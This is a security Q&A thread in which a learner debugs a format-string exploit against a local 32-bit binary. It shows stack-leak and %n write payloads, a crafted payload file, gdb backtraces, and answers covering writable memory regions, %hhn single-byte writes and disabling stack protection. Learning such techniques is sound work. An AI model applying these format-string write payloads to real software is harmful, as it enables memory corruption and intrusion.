# Segmentation fault trying to exploit printf vulnerability

Tags: exploit, known-vulnerabilities, memory, c, format-string

I am trying to learn more about printf vulnerability. I understand the theory but I am unable to put it into practice.

### TL;DR

All my attempts to write a single byte into memory result in a Segmentation fault.

What is the most likely reason for the failure? My guess is that it may be some sort of protection in modern compilers/OS (I am running that on 64 bit Ubuntu Xenial), but I don't know much about it.

### Details

I am able to read stack. I found that that the call I am trying to exploit puts 6*4 bytes in front of my input:

```
Your choice: AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x
You entered: AAAA.00000001.00000005.f76c7d60.0000000a.09787008.ff9c9e48.41414141
```

I disassembled the binary and found the memory location(s) I want to change. I tried various addresses, both code and data with the same result. For instance, the address of the string *Your choice:* is `0x0804b795`.

```
$ gdb -batch -ex "x/s 0x0804b795" ./a.out
0x804b795:  "Your choice: "
```

I am able to write that address to the payload:

```
$ echo "the binary ignores the 1st line" > ./payload
$ echo $(printf "\x95\xb7\x04\x08").%08x.%08x.%08x.%08x.%08x.%08x.%08x >> ./payload
$ cat payload - | ./a.out

Your choice: You entered: ?.00000001.00000005.f76f5d60.0000000a.09844008.ff8ff1d8.0804b795
```

Then I replace the last `%08x` with `%n` to write into that address. The number of printed chars would be 4 (for the address) + 6 * 8 (padded %x) + 7 (dots) = 59 which puts the value to be written in ASCII range; 59 stands for semicolon - a suitable character to write into a string.

```
$ echo "the binary ignores the 1st line" > ./payload
$ echo $(printf "\x95\xb7\x04\x08").%08x.%08x.%08x.%08x.%08x.%08x.%n >> ./payload
$ cat payload | ./a.out
```

To my best knowledge that should work and I was hoping to see *;our choice* prompt on next iteration but I am getting

```
Your choice: You entered: 

Segmentation fault
```

To confirm:

```
$ gdb a.out

(gdb) run < payload

Your choice: You entered:


Program received signal SIGSEGV, Segmentation fault.
0xf7e58dff in vfprintf () from /lib32/libc.so.6

(gdb) bt
#0  0xf7e58dff in vfprintf () from /lib32/libc.so.6
#1  0xf7e5df66 in printf () from /lib32/libc.so.6
#2  0x080487b4 in getInput ()
#3  0x0804b206 in programMain ()
#4  0x0804b3b0 in main ()
```

What am I missing? What else can I check?

Answer (score 2):

I recommend you to check if the 0x0804b795 address is writable.

You can see the different regions of a running process in `/proc/PID/maps`. For example:

```
$ sleep 10 &
[1] 1438
$ cat /proc/$(pgrep -f 'sleep 10')/maps
08048000-0804d000 r-xp 00000000 08:01 399565     /bin/sleep
0804d000-0804e000 r--p 00005000 08:01 399565     /bin/sleep
0804e000-0804f000 rw-p 00006000 08:01 399565     /bin/sleep
084b4000-084d5000 rw-p 00000000 00:00 0          [heap]
[...]
```

In this case only the addresses between 0804e000-0804f000 and 084b4000-084d5000 are writable.

Inside GDB, you can use `info proc` or `info inferior` to get the PID of the debugged program.

Also, keep in mind that `%n` will write an integer value, not a single character. I mean, in this case it will write 4 chars (in little-endian). But you can use `%hhn` to write a single character.

I recommend you to read http://jbremer.org/format-string-vulnerabilities/ and to look at the [`printf(3)`](https://linux.die.net/man/3/printf) documentation.

Comment: Thank you, you were spot on:
`/proc/9512$ cat maps`

`08048000-0804c000 r-xp 00000000 08:00 434                                /tmp/a.out`

`0804c000-0804e000 rw-p 00003000 08:00 434                                /tmp/a.out`
`...`
Does that mean there is no chance to exploit the string format vulnerability without modifying the binary? There is a writable region with a copy of the code, but I don't think it ever gets executed.

Comment: If you need to exploit the binary writing into a region, try to search the writable section to see what it is there.

Answer (score 1):

Try taking a look here:
[Stack Overflows - Defeating Canaries, ASLR, DEP, NX](https://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx)

It sounds like you might have a stack canary. You would need to specifically compile the target program without stack canary protection. 
Learn more about how here:
https://stackoverflow.com/questions/2340259/how-to-turn-off-gcc-compiler-optimization-to-enable-buffer-overflow

In short you would need to do:

> gcc target.c -fno-stack-protector

Also! Make sure your string has a null byte at the end \00 :)

Comment: Thanks, that is interesting, but I don't think there is a canary; at least according to r2 analysis.